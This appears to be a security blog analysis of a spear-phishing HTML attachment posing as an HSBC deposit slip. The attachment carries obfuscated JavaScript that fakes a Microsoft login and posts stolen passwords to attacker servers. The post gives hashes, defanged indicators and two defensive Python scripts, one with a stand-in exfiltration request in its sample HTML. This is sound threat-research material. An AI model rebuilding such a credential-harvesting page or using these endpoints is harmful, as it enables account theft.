Spear-Phishing Stealer Targeting Malaysians: HSBC E-Mail Analysis

A recent malicious spear-phishing campaign, seen at 1:52 AM on Monday, September 25, 2023, appears to be targeting Malaysians. This blog post recounts a real-life encounter with a suspicious HTML email targeting Fatah's personal account. The threat actor delivered a fake Microsoft login page, written in HTML, that can steal user and password data from devices that install the attachment. The attachment was distributed to the victim via email, with a message asking the victim to install it to view a deposit slip from HSBC Bank. Fatah had not made any recent deposits with HSBC Bank, so the email raised red flags.

This blog post may be useful for security researchers and security analysts who want to stay up to date on current cybersecurity issues, specifically spear-phishing threats and Malaysian cybersecurity news. By the end of this blog post, readers will have a better understanding of the tactics and techniques used in spear-phishing attacks.


Non-Technical Summary

In this malicious campaign, the threat actor ingeniously lures the victim into believing that they have initiated a payment transaction through HSBC Bank, a reputable financial institution.

After the victim opens a malicious HTML attachment, it prompts them to enter their Microsoft login password. When the victim enters their password, the attacker steals their login credentials. What makes this phishing attack particularly insidious is that the attacker doesn't stop at pilfering the victim's login credentials: they go a step further by exfiltrating this ill-gotten data to their own database. This operation enables the threat actor to build a repository of stolen login credentials, putting countless individuals at risk of unauthorized access to their Microsoft accounts.

The stolen information could be used for illegal activities. The threat actor could use it to access Microsoft accounts without permission, which could lead to the exposure of sensitive personal and business data. It could also enable the threat actor to launch additional cyberattacks.


Technical Analysis

HTML metadata information 

Attachment name: Deposit✧SLlP_fatahillah.hashim.html

MD5 hash: 6dd0ec81348d343197384212e0b27b82

SHA-1 hash: f008551b0976b70d0d0e4bba37864017608c8f50

SHA-256 hash: 9751bcf82cb9eb1d67b47894499ad2d17e0886a2d9028f5264d118a5013b97bf

Vhash htm: 09d5a7048ce5f1f41c84372bc0c19fcc

SSDEEP 1536: 6NQlakxOikxONbKP/nuDXnNNztOPi0PFE5faM08l70lF6tfP:BP

TLSH: T14A5321C96BEE13D7D7327B6C1AE604819E4CDBBF1E12C1C4B1B999470B344654AC3AE8

File type: HTML

File size: 64.83 KB (66383 bytes)


Malicious Capabilities

When the HTML attachment is opened for the first time, it asks the user to enter their Microsoft login password. Reading the source code shows that it contains obfuscated JavaScript. We were able to deobfuscate it into a more readable script.


Obfuscated JavaScript



Deobfuscated & Code analysis

Found a JavaScript file embedded in the HTML attachment:

https://creepyquestionablegroupware[.]lengoma[.]repl[.]co/john.js. 

It performs several actions related to form validation and making an XMLHttpRequest (an API for making HTTP requests) to a server.

The code defines several variables, each of which represents an HTML element on the page:

https://gist.githubusercontent.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549/raw/33772380a9253f0e6805040550dd489ffc06e6f1/deobfuscated.js

There's a loaded() function (its purpose is unclear: the code doesn't show where it's called or what the number is supposed to represent).

The code sets up an event listener for the keyup event on the Passsection element. When a key is pressed in Passsection, it checks if the key code is equal to 13 (Enter key). If it is, it calls the NEE() function.

The validateEmail function is defined but not used in this code.

An event listener is added to the PASS element for the keyup event. When a key is released in the password input field, it hides an error message and removes a CSS class has-error from the PASS element. The NEE() function is called when the Enter key is pressed in the password input field. If the password input is empty, it displays an error message and adds the has-error class to the PASS element, focusing on it. If the password is not empty, it sends an HTTP POST request to a URL (hxxps[://]northuistcottage[.]com/test[.]php) with user and password data. It also updates a counter variable count.

An XMLHttpRequest object is created (_0x83c59) and configured to make a POST request to the specified URL with the user and password data as the request body. It also sets the request header to indicate that the data is in the form of application/x-www-form-urlencoded. The code defines an onreadystatechange event handler for the XMLHttpRequest object. When the readyState of the request changes to XMLHttpRequest.DONE (4), it processes the response. Depending on the value of count, it either replaces the class of an HTML element, sets its style to "display:none," and redirects to a URL or displays an error message.

https://gist.githubusercontent.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549/raw/0da2ae1513321b6699fc523835db8d30c2bb3faf/NEE.js
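The behaviour described above (a password prompt, a script pulled from a third-party host, and an XMLHttpRequest POST to an unrelated domain) can be checked statically before anyone opens the attachment. The following triage script is an added example, not code from the original post; the allowlist, the `Scanner` and `triage` names, and the sample HTML with its `example.test` hosts are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: hosts a genuine Microsoft sign-in page loads from or posts to.
TRUSTED = ("microsoftonline.com", "msauth.net", "microsoft.com")
# Constructed sample with placeholder hosts; it is not the real attachment.
SAMPLE = """<html><body><input type="password" id="PASS">
<script src="https://loader.example.test/john.js"></script>
<script>var _0x83c59=new XMLHttpRequest();
_0x83c59.open('POST','https://collector.example.test/test.php');</script></body></html>"""

class Scanner(HTMLParser):
    """Collects password inputs, remote script URLs and inline script text."""
    def __init__(self):
        super().__init__()
        self.passwords, self.scripts, self.inline, self._in_js = 0, [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.passwords += 1
        elif tag == "script":
            self._in_js = True
            if attrs.get("src"):
                self.scripts.append(attrs["src"])
    def handle_endtag(self, tag):
        self._in_js = self._in_js and tag != "script"
    def handle_data(self, data):
        if self._in_js:
            self.inline.append(data)

def untrusted(url):
    host = (urlparse(url).hostname or "").lower()
    return not any(host == t or host.endswith("." + t) for t in TRUSTED)

def triage(html):
    """Static check: a password prompt plus code or endpoints on foreign hosts."""
    s = Scanner()
    s.feed(html)
    js = "\n".join(s.inline)
    report = {
        "password_field": s.passwords > 0,
        "remote_scripts": [u for u in s.scripts if untrusted(u)],
        "endpoints": [u for u in re.findall(r"https?://[^\s'\"<>)]+", js) if untrusted(u)],
        # _0x-prefixed names are a common marker of machine-obfuscated JavaScript
        "hex_names": sorted(set(re.findall(r"\b_0x[0-9a-f]+\b", js))),
    }
    report["suspicious"] = s.passwords > 0 and bool(report["remote_scripts"] or report["endpoints"])
    return report

print(triage(SAMPLE))
```

When the credential-posting logic lives only in the remote script, as with john.js here, the attachment itself shows just the `remote_scripts` entry, so that field alone is worth escalating on.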

https://creepyquestionablegroupware[.]lengoma[.]repl[.]co/


https://replit[.]com/@lengoma

We believe that the spear-phishing attack started a month ago using code from a Replit project. VirusTotal has had a record of this malicious code for two years, which suggests that the attacker is reusing code that was previously created by someone else.

https://replit.com/@lengoma?tab=repls


https://replit[.]com/@lengoma/CreepyQuestionableGroupware#john[.]js


VirusTotal scan results for the HTML file *Deposit✧SLlP_fatahillah.hashim.html*:

https://www.virustotal.com/gui/file/9751bcf82cb9eb1d67b47894499ad2d17e0886a2d9028f5264d118a5013b97bf/detection


Final URL: https://aadcdn[.]msauth[.]net/

Serving IP Address: 13[.]107.246.38




Indicators

https://northuistcottage[.]com/test.php

https://northuistcottage[.]com/svr.php

https://marccos.com/test[.]php

https://bometome.com/svr[.]php

https://aadcdn[.]msauth[.]net/ at 13[.]107.246.38

mout[.]kundenserver[.]de at 212[.]227.126.187

mrelayeu[.]kundenserver[.]de at 50[.]114.60.104

kundenserver[.]de 
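To hunt for these indicators in web-proxy logs, the defanged values first have to be normalised. The following is an added example, not part of the original post; the log format, the function names and the `SHARED` grading of hosts that also serve legitimate traffic are assumptions.

```python
import re
from urllib.parse import urlparse

# Indicators as written in this post, in its mixed defanging styles.
INDICATORS = [
    "hxxps[://]northuistcottage[.]com/test[.]php",
    "https://marccos.com/test[.]php",
    "https://bometome.com/svr[.]php",
    "https://creepyquestionablegroupware[.]lengoma[.]repl[.]co/john.js",
    "https://aadcdn[.]msauth[.]net/",
    "kundenserver[.]de",
]
# Assumption of this example: these hosts also carry legitimate traffic
# (Microsoft sign-in assets, a mail provider), so a hit is context, not an alert.
SHARED = {"aadcdn.msauth.net", "kundenserver.de"}

# Constructed proxy log lines (timestamp, client, method, URL, status), kept defanged here.
LOG = [
    "2023-09-25T01:55:02Z 10.0.0.23 GET https://aadcdn[.]msauth[.]net/logo.svg 200",
    "2023-09-25T01:55:40Z 10.0.0.23 POST https://northuistcottage[.]com/test.php 200",
    "2023-09-25T01:56:10Z 10.0.0.41 GET https://www.example.test/index.html 200",
]

def refang(text):
    """Undo the defanging styles used on this page."""
    return text.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")

def host_of(value):
    value = refang(value.strip())
    if "://" not in value:
        value = "//" + value  # bare domain: let urlparse treat it as a host
    return (urlparse(value).hostname or "").lower()

def match_log(lines, indicators=INDICATORS):
    """Return (timestamp, client, host, level) for every line that hits an indicator host."""
    bad = {host_of(i) for i in indicators}
    hits = []
    for line in lines:
        ts, client, method, url, _status = refang(line).split()
        host = host_of(url)
        ioc = next((b for b in bad if host == b or host.endswith("." + b)), None)
        if ioc:
            level = "context" if ioc in SHARED else ("high" if method == "POST" else "medium")
            hits.append((ts, client, host, level))
    return hits

print(match_log(LOG))
```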


Credit: Shiau Huei

